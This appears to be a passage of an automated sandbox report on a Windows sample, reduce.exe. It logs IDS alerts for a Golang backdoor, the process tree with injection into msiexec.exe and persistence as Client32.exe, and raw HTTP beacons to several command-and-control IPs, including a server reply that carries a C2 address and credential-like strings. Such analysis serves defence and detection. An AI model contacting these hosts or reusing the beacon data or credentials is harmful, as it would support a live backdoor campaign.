                          comctl32.dllInitCommonControls, ImageList_Create, ImageList_Destroy, ImageList_GetImageCount, ImageList_SetImageCount, ImageList_Add, ImageList_Replace, ImageList_AddMasked, ImageList_DrawEx, ImageList_DrawIndirect, ImageList_Remove, ImageList_Copy, ImageList_BeginDrag, ImageList_EndDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_DragMove, ImageList_DragShowNolock, _TrackMouseEvent
                          imm32.dllImmGetContext, ImmReleaseContext, ImmGetCompositionStringW, ImmNotifyIME
                          comdlg32.dllChooseColorA, CommDlgExtendedError, GetOpenFileNameW, GetSaveFileNameW, ChooseFontW
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          SerbianItaly
                          PortugueseBrazil
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-12-04T23:24:07.286691+01002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21185.121.233.15228250192.168.2.449763TCP
                          2024-12-04T23:24:07.286896+01002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.449763185.121.233.15228250TCP
                          2024-12-04T23:24:36.083072+01002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.449763185.121.233.15228250TCP
                          2024-12-04T23:24:36.469876+01002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11185.121.233.15228250192.168.2.449763TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Dec 4, 2024 23:23:32.413621902 CET4974180192.168.2.446.8.232.106
                          Dec 4, 2024 23:23:32.533416033 CET804974146.8.232.106192.168.2.4
                          Dec 4, 2024 23:23:32.533818007 CET4974180192.168.2.446.8.232.106
                          Dec 4, 2024 23:23:32.534853935 CET4974180192.168.2.446.8.232.106
                          Dec 4, 2024 23:23:32.654566050 CET804974146.8.232.106192.168.2.4
                          Dec 4, 2024 23:23:42.410769939 CET4974180192.168.2.446.8.232.106
                          Dec 4, 2024 23:23:42.412579060 CET4974280192.168.2.446.8.236.61
                          Dec 4, 2024 23:23:42.532335997 CET804974246.8.236.61192.168.2.4
                          Dec 4, 2024 23:23:42.532434940 CET4974280192.168.2.446.8.236.61
                          Dec 4, 2024 23:23:42.532676935 CET4974280192.168.2.446.8.236.61
                          Dec 4, 2024 23:23:42.570749044 CET804974146.8.232.106192.168.2.4
                          Dec 4, 2024 23:23:42.652481079 CET804974246.8.236.61192.168.2.4
                          Dec 4, 2024 23:23:52.423908949 CET4974280192.168.2.446.8.236.61
                          Dec 4, 2024 23:23:52.425318003 CET4974380192.168.2.491.212.166.91
                          Dec 4, 2024 23:23:52.545067072 CET804974391.212.166.91192.168.2.4
                          Dec 4, 2024 23:23:52.545312881 CET4974380192.168.2.491.212.166.91
                          Dec 4, 2024 23:23:52.545561075 CET4974380192.168.2.491.212.166.91
                          Dec 4, 2024 23:23:52.586755037 CET804974246.8.236.61192.168.2.4
                          Dec 4, 2024 23:23:52.665402889 CET804974391.212.166.91192.168.2.4
                          Dec 4, 2024 23:23:53.901345015 CET804974391.212.166.91192.168.2.4
                          Dec 4, 2024 23:23:53.902575970 CET4974480192.168.2.4188.130.206.243
                          Dec 4, 2024 23:23:53.949980021 CET4974380192.168.2.491.212.166.91
                          Dec 4, 2024 23:23:54.022780895 CET8049744188.130.206.243192.168.2.4
                          Dec 4, 2024 23:23:54.023026943 CET4974480192.168.2.4188.130.206.243
                          Dec 4, 2024 23:23:54.023226976 CET4974480192.168.2.4188.130.206.243
                          Dec 4, 2024 23:23:54.142873049 CET8049744188.130.206.243192.168.2.4
                          Dec 4, 2024 23:23:54.445663929 CET804974146.8.232.106192.168.2.4
                          Dec 4, 2024 23:23:54.449816942 CET4974180192.168.2.446.8.232.106
                          Dec 4, 2024 23:24:02.553267002 CET4974380192.168.2.491.212.166.91
                          Dec 4, 2024 23:24:02.673320055 CET804974391.212.166.91192.168.2.4
                          Dec 4, 2024 23:24:02.673404932 CET4974380192.168.2.491.212.166.91
                          Dec 4, 2024 23:24:03.929549932 CET4974480192.168.2.4188.130.206.243
                          Dec 4, 2024 23:24:03.930352926 CET4975780192.168.2.438.180.205.164
                          Dec 4, 2024 23:24:04.050194025 CET804975738.180.205.164192.168.2.4
                          Dec 4, 2024 23:24:04.053621054 CET4975780192.168.2.438.180.205.164
                          Dec 4, 2024 23:24:04.053802967 CET4975780192.168.2.438.180.205.164
                          Dec 4, 2024 23:24:04.090552092 CET8049744188.130.206.243192.168.2.4
                          Dec 4, 2024 23:24:04.173731089 CET804975738.180.205.164192.168.2.4
                          Dec 4, 2024 23:24:04.461545944 CET804974246.8.236.61192.168.2.4
                          Dec 4, 2024 23:24:04.461620092 CET4974280192.168.2.446.8.236.61
                          Dec 4, 2024 23:24:05.961430073 CET804975738.180.205.164192.168.2.4
                          Dec 4, 2024 23:24:05.967540979 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:24:06.014497042 CET4975780192.168.2.438.180.205.164
                          Dec 4, 2024 23:24:06.087333918 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:06.087649107 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:24:07.286690950 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:07.286895990 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:24:07.406651974 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:15.929838896 CET8049744188.130.206.243192.168.2.4
                          Dec 4, 2024 23:24:15.929977894 CET4974480192.168.2.4188.130.206.243
                          Dec 4, 2024 23:24:22.412502050 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:24:22.532269001 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:27.128722906 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:27.128876925 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:24:27.248532057 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:35.973332882 CET4975780192.168.2.438.180.205.164
                          Dec 4, 2024 23:24:36.083071947 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:24:36.093136072 CET804975738.180.205.164192.168.2.4
                          Dec 4, 2024 23:24:36.202979088 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:36.469876051 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:36.517687082 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:24:47.516107082 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:24:47.516365051 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:24:47.636079073 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:25:02.641793966 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:25:02.761646032 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:25:06.094912052 CET4975780192.168.2.438.180.205.164
                          Dec 4, 2024 23:25:06.217379093 CET804975738.180.205.164192.168.2.4
                          Dec 4, 2024 23:25:06.485685110 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:25:06.605407000 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:25:06.874191999 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:25:06.923664093 CET4976328250192.168.2.4185.121.233.152
                          Dec 4, 2024 23:25:07.904146910 CET2825049763185.121.233.152192.168.2.4
                          Dec 4, 2024 23:25:07.948724985 CET4976328250192.168.2.4185.121.233.152
                          • 46.8.232.106
                          • 46.8.236.61
                          • 91.212.166.91
                          • 188.130.206.243
                          • 38.180.205.164
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44974146.8.232.106808024C:\Windows\SysWOW64\msiexec.exe
                          TimestampBytes transferredDirectionData
                          Dec 4, 2024 23:23:32.534853935 CET302OUTPOST / HTTP/1.1
                          Host: 46.8.232.106
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: RevesNFj
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.44974246.8.236.61808024C:\Windows\SysWOW64\msiexec.exe
                          TimestampBytes transferredDirectionData
                          Dec 4, 2024 23:23:42.532676935 CET301OUTPOST / HTTP/1.1
                          Host: 46.8.236.61
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: 4l7XKmIh
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.44974391.212.166.91808024C:\Windows\SysWOW64\msiexec.exe
                          TimestampBytes transferredDirectionData
                          Dec 4, 2024 23:23:52.545561075 CET303OUTPOST / HTTP/1.1
                          Host: 91.212.166.91
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: WN3Xwx7a
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL
                          Dec 4, 2024 23:23:53.901345015 CET183INHTTP/1.1 429 Too Many Requests
                          Content-Type: text/plain; charset=utf-8
                          X-Content-Type-Options: nosniff
                          Date: Wed, 04 Dec 2024 22:23:53 GMT
                          Content-Length: 18
                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                          Data Ascii: Too many requests


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449744188.130.206.243808024C:\Windows\SysWOW64\msiexec.exe
                          TimestampBytes transferredDirectionData
                          Dec 4, 2024 23:23:54.023226976 CET305OUTPOST / HTTP/1.1
                          Host: 188.130.206.243
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: PnB4uTNY
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.44975738.180.205.164808024C:\Windows\SysWOW64\msiexec.exe
                          TimestampBytes transferredDirectionData
                          Dec 4, 2024 23:24:04.053802967 CET304OUTPOST / HTTP/1.1
                          Host: 38.180.205.164
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: FBNFqv4X
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL
                          Dec 4, 2024 23:24:05.961430073 CET388INHTTP/1.1 200 OK
                          Date: Wed, 04 Dec 2024 22:24:05 GMT
                          Content-Length: 270
                          Content-Type: text/plain; charset=utf-8
                          Data Raw: 31 38 35 2e 31 32 31 2e 32 33 33 2e 31 35 32 3b 32 38 32 35 30 3b 68 33 69 67 74 70 68 69 74 63 4d 63 70 36 6a 34 3a 6d 6d 51 2f 35 78 4c 2f 74 59 33 39 51 76 6d 31 42 4c 36 2e 65 31 77 32 59 6f 56 31 6a 49 63 32 66 78 42 2e 32 66 65 31 63 55 48 36 58 52 78 36 5a 67 48 2e 50 7a 64 39 67 6c 66 31 67 71 38 2c 46 30 63 68 6b 4d 4b 74 34 64 49 74 6f 51 31 70 51 4a 63 3a 54 42 47 2f 4e 47 77 2f 5a 37 65 33 6d 56 64 38 33 33 4e 2e 79 34 42 31 6d 4f 47 38 46 39 37 30 62 47 57 2e 52 44 6e 32 30 33 34 30 74 55 65 35 67 50 71 2e 4e 37 43 31 75 76 57 36 58 57 71 34 51 68 30 2c 34 5a 67 68 47 50 7a 74 4d 57 66 74 66 76 78 70 6d 4a 69 3a 76 68 72 2f 70 30 61 2f 38 69 64 39 53 4c 6e 31 53 6d 6f 2e 59 63 4d 32 4c 36 4a 31 6e 4b 62 32 31 35 6a 2e 72 77 6a 31 36 5a 59 36 34 56 73 36 78 53 76 2e 58 77 30 39 42 49 41
                          Data Ascii: 185.121.233.152;28250;h3igtphitcMcp6j4:mmQ/5xL/tY39Qvm1BL6.e1w2YoV1jIc2fxB.2fe1cUH6XRx6ZgH.Pzd9glf1gq8,F0chkMKt4dItoQ1pQJc:TBG/NGw/Z7e3mVd833N.y4B1mOG8F970bGW.RDn20340tUe5gPq.N7C1uvW6XWq4Qh0,4ZghGPztMWftfvxpmJi:vhr/p0a/8id9SLn1Smo.YcM2L6J1nKb215j.rwj16ZY64Vs6xSv.Xw09BIA
                          Dec 4, 2024 23:24:35.973332882 CET6OUTData Raw: 00
                          Data Ascii:
                          Dec 4, 2024 23:25:06.094912052 CET6OUTData Raw: 00
                          Data Ascii:


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:17:22:59
                          Start date:04/12/2024
                          Path:C:\Users\user\Desktop\reduce.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\reduce.exe"
                          Imagebase:0x100000000
                          File size:18'233'144 bytes
                          MD5 hash:B0F4C61F99716127097DA80D07ED6123
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:17:23:02
                          Start date:04/12/2024
                          Path:C:\Windows\SysWOW64\more.com
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\more.com
                          Imagebase:0x830000
                          File size:24'576 bytes
                          MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:2
                          Start time:17:23:02
                          Start date:04/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:17:23:25
                          Start date:04/12/2024
                          Path:C:\Windows\SysWOW64\msiexec.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\msiexec.exe
                          Imagebase:0x9b0000
                          File size:59'904 bytes
                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:8
                          Start time:17:23:26
                          Start date:04/12/2024
                          Path:C:\Users\user\AppData\Roaming\jion\Client32.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\AppData\Roaming\jion\Client32.exe"
                          Imagebase:0x100000000
                          File size:18'233'144 bytes
                          MD5 hash:B0F4C61F99716127097DA80D07ED6123
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:17:23:29
                          Start date:04/12/2024
                          Path:C:\Windows\SysWOW64\more.com
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\more.com
                          Imagebase:0x830000
                          File size:24'576 bytes
                          MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:10
                          Start time:17:23:29
                          Start date:04/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:17:23:44
                          Start date:04/12/2024
                          Path:C:\Windows\SysWOW64\msiexec.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\msiexec.exe
                          Imagebase:0x9b0000
                          File size:59'904 bytes
                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:34.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:9
                            Total number of Limit Nodes:0
                            execution_graph 86 1000030a0 87 1000030ca 86->87 90 1000190a0 87->90 91 1000190ba 90->91 92 1000190f0 91->92 95 100018f80 92->95 94 1000030db 97 100018f92 95->97 96 100019084 ExitProcess 96->94 97->96

                            Callgraph

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000000.00000002.1719435664.0000000100001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000100000000, based on PE: true
                            • Associated: 00000000.00000002.1719420329.0000000100000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719793949.00000001005E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719808255.00000001005ED000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719873607.0000000100637000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719885626.0000000100639000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719936225.000000010063A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719947395.000000010063B000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719959534.000000010063E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719971578.0000000100640000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719985238.000000010064F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719997011.0000000100652000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720009292.0000000100653000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720094571.0000000100654000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720107785.0000000100657000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720120775.000000010065C000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720133215.0000000100663000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720145160.0000000100664000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720157421.0000000100665000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720170049.0000000100666000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720414210.00000001009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720414210.00000001009B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720414210.00000001009C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720531012.00000001009CA000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720551413.00000001009CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720577037.00000001009CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_100000000_reduce.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: cbdc517d08d70e67295529891a336eec7399af31cb94bd593c70ca53ae34146f
                            • Instruction ID: 48b02fbab7062bd5209345767caade3ea1fe5ce447ca554bedf2b050c477dbd2
                            • Opcode Fuzzy Hash: cbdc517d08d70e67295529891a336eec7399af31cb94bd593c70ca53ae34146f
                            • Instruction Fuzzy Hash: 6BF01D75700A50CCF702AB6098153CD3768B309B88F484526AE8C17B0ACFB4C2D28780

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000000.00000002.1719435664.0000000100001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000100000000, based on PE: true
                            • Associated: 00000000.00000002.1719420329.0000000100000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719793949.00000001005E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719808255.00000001005ED000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719873607.0000000100637000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719885626.0000000100639000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719936225.000000010063A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719947395.000000010063B000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719959534.000000010063E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719971578.0000000100640000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719985238.000000010064F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719997011.0000000100652000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720009292.0000000100653000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720094571.0000000100654000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720107785.0000000100657000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720120775.000000010065C000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720133215.0000000100663000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720145160.0000000100664000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720157421.0000000100665000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720170049.0000000100666000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720414210.00000001009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720414210.00000001009B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720414210.00000001009C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720531012.00000001009CA000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720551413.00000001009CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720577037.00000001009CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_100000000_reduce.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2266927e57963bc7d73e39e48b32372e8f3b6fdaed5d289f772148ce9b545172
                            • Instruction ID: e7c1e186aca81daaf9e6d333712158edd3ca37f5a671d8e7065e9d07a9428669
                            • Opcode Fuzzy Hash: 2266927e57963bc7d73e39e48b32372e8f3b6fdaed5d289f772148ce9b545172
                            • Instruction Fuzzy Hash: D4E0B631610985E4EA17EB60EC097D82324B75C3C8FC45062A5CD421AADFA8CA8ACB51

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 14 100003190 15 100003196-10000319b 14->15
                            Memory Dump Source
                            • Source File: 00000000.00000002.1719435664.0000000100001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000100000000, based on PE: true
                            • Associated: 00000000.00000002.1719420329.0000000100000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719793949.00000001005E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719808255.00000001005ED000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719873607.0000000100637000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719885626.0000000100639000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719936225.000000010063A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719947395.000000010063B000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1719959534.000000010063E000.00000004.00000001.01000000.00000003.sdmpDownload File
